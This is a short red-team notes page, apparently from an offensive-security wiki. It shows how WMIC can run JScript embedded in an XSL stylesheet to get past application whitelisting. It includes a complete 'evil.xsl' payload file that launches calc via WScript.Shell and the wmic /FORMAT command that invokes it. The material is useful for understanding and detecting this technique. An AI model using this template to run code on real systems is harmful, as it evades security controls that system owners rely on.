Application Whitelisting Bypass with WMIC and XSL

Another application whitelist bypassing technique discovered by Casey @subTee, similar to squiblydoo:
T1117: regsvr32
/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo
Execution
Define the XSL file containing the jscript payload:
evil.xsl
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
	<![CDATA[
	var r = new ActiveXObject("WScript.Shell").Run("calc");
	]]> </ms:script>
</stylesheet>
Invoke any wmic command now and specify /format pointing to the evil.xsl:
attacker@victim
wmic os get /FORMAT:"evil.xsl"
Observation
Calculator is spawned by svchost.exe:
References
WMIC.EXE Whitelisting Bypass - Hacking with Style, Stylesheets
tl;dr     WMIC can invoke XSL (eXtensible Stylesheet Language) scripts, either locally or from a URL.   Local File   wmic process list /FO...
subt0x11.blogspot.com
​

T1202: Forfiles Indirect Command Execution

Powershell Without Powershell.exe

Last updated 2 years ago